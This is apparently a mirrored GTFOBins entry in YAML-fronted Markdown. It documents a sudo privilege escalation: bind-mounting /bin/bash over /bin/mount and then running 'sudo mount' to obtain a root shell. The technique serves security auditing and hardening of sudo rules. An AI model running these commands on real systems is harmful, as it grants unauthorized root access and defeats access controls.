mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
9 lines
190 B
Markdown
9 lines
190 B
Markdown
|
---
|
||
|
functions:
|
||
|
sudo-enabled:
|
||
|
- description: bind mount bash to the mount binary, as mount is sudo enabled.
|
||
|
code: |
|
||
|
sudo mount -o bind /bin/bash /bin/mount
|
||
|
sudo mount
|
||
|
---
|